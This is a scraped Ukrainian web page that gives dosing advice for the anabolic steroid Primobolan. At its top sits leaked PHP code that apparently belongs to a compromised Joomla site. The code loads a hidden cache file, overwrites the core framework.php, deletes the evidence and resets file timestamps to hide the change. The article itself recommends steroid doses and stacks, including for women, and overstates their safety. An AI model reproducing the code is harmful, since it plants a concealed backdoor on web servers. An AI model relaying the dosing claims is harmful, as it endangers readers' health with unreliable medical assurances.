$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Прімоболан | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Прімоболан

ПрімоболанВсе, що написано про таблетки Прімоболана, відноситься і до Прімоболану тривалої дії. Але все ж між цими двома препаратами є деякі розбіжності, які треба описати окремо. Перш за все, впадає в око те, що вони випускаються в різних формах: Прімоболан тривалої дії вводиться внутрішньо м’язово, а таблетки Прімоболана приймаються орально. Ще одне, не відразу кидається в очі, різниця полягає в тому, що таблетки містять ацетатну форму метенолона, а ін'єкційні розчини - енантатну. Більшості атлетів енантат здається лише формою Прімоболана тривалішої дії. Вірно, але одного цього пояснення недостатньо. Прімоболан тривалої дії слід вживати лише раз на тиждень внаслідок його тривалого періоду дії, таблетки ж приймаються щоденно. При прийомі Прімоболана тривалої дії з дозуванням 200мг на тиждень може відбутися легке скупчення води, що сприяє накопиченню сили і маси. Оскільки цього не відбувається при оральній формі, то це може бути підставою для прийому Прімоболана тривалої дії. Новачки в стероїдних курсах при дозі 200мг на тиждень можуть досягти гарних результатів і на протязі 8 тижнів набрати 6-7кг, не піклуючись про те, що багато пропаде після припинення прийому препарату. Прімоболан - хороший базисний стероїд з переважно анаболічною дією, хоча і слабший, ніж Дека-дураболін, і може, в залежності від мети, ефективно комбінуватися майже з усіма стероїдами. Ті, кому хочеться швидко набрати масу, але немає під рукою Дека-дураболіну, можуть приймати Прімоболан тривалої дії з сустаноном 250 і Діанаболом. Ті, у кого більше терпіння, або побоюється потенційних ушкоджень печінки, дуже задоволені, судячи з досвіду, комбінацією з Прімоболана тривалої дії в кількості 200мг на тиждень і Дека-дураболін в кількості 200-400мг на тиждень.

Є думка, що: Прімоболан тривалої дії найкраще комбінується з Вінстролом тривалої дії. 200-400мг на тиждень - це звичайна загальноприйнята доза Прімоболана тривалої дії, хоча існує безліч атлетів, які щодня використовують 100-мг ампулу. Прімоболан тривалої дії, як і оральна ацетатна форма, не перетворюється на естрогени, але викликають легке накопичення води, тому при підготовці до змагань атлети найчастіше вживають таблетки. Побічні явища Прімоболана тривалої дії мінімальні, проявляються у особливо чутливих людей у вигляді невеликого акне, зниження тембру голосу і посиленого росту волосся. Прімоболан тривалої дії робить ще менший вплив на функцію печінки, ніж оральна форма, у т.ч. малоймовірне підвищення показників печінки. Кров'яний тиск, рівень холестерину, показники HDL і LDL, як і при таблетках Прімоболана, залишаються в нормі. І, взагалі, Прімоболан тривалої дії - це самий надійний ін'єкційний засіб серед усіх стероїдів. Атлети, показники печінки яких при прийомі анаболічних стероїдов сильно підвищуються, але які не хочуть відмовлятися від їх застосування, можуть при регулярному контролі печінки спробувати комбінацію з Прімоболана тривалої дії, Дека-дураболін і Андріола. Досить добре відомий у Німеччині культурист, який зумів завоювати вже кілька національних титулів, зізнався, що його печінка від занадто частого застосування 17-альфа-ал'кулірованних стероїдів Діанабола, Анаполона 50 (тоді ще Пленастріла) і оксандролона дещо постраждала, але йому вдалося, знову довести своє тіло до рівня національного чемпіонату за допомогою 200мг Прімоболана тривалої дії на тиждень, 460мг Дека-дураболіну на тиждень і 240мг Андріола на день; і така комбінація дещо вплинула негативно на печінку. Прімоболан тривалої дії, як і таблетки, має дуже незначний вплив на дугу "гіпоталамус-гіпофіз-яєчка", тобто власне вироблення тестостерону знижується лише при дуже високих дозах і надмірно тривалому застосуванні препарату.

Жінки віддають перевагу 25мг таблеткам, та все ж є атлетки, які вколюють собі 100-200мг і більше Прімоболана тривалої дії на тиждень. 100мг Прімоболана тривалої дії на тиждень в комбінації з 50 мг Вінстрола тривалої дії на тиждень, судячи з досвіду, добре діє на багатьох жінок. Така комбінація добре переноситься багатьма жінками, і явища маскулінізації спостерігаються вкрай рідко. Жінкам все-таки варто звернути увагу на те, щоб між ін'єкціями був проміжок 3-4 дні для уникнення небажаного скупчення андрогенів в організмі. Але для атлеток великого спорту це поєднання надто слабке.

Прімоболан тривалої дії часто застосовується в дозі 100мг на тиждень для подолання стероїдної паузи, що, на наш погляд, є не поганою ідеєю і ось чому: безперервне застосування анаболічних стероїдів сильно впливає на власне вироблення тестостерону та заважає організму нормалізувати цю функцію. Хоча така низька доза як 100мг Прімоболана тривалої дії на тиждень або 50 мг Дека-дураболіну на тиждень не токсична, і в принципі не має побічних явищ, ефективність її все ж таки викликає сумнів, оскільки обидва препарати в таких дозах дуже слабкі для успішного подолання катаболічної фази в період відпочинку від стероїдів. З Кленбутеролом досягаються кращі результати, при цьому не зачіпається гормональна система. Ті, хто думає, що в стероїдну паузу вони повинні щось приймати, то вони повинні вводити собі тестостерон тривалої дії (приміром, Тестенат) кожні 2-3 тижні.

 
Статті СТЕРОЇДИ Прімоболан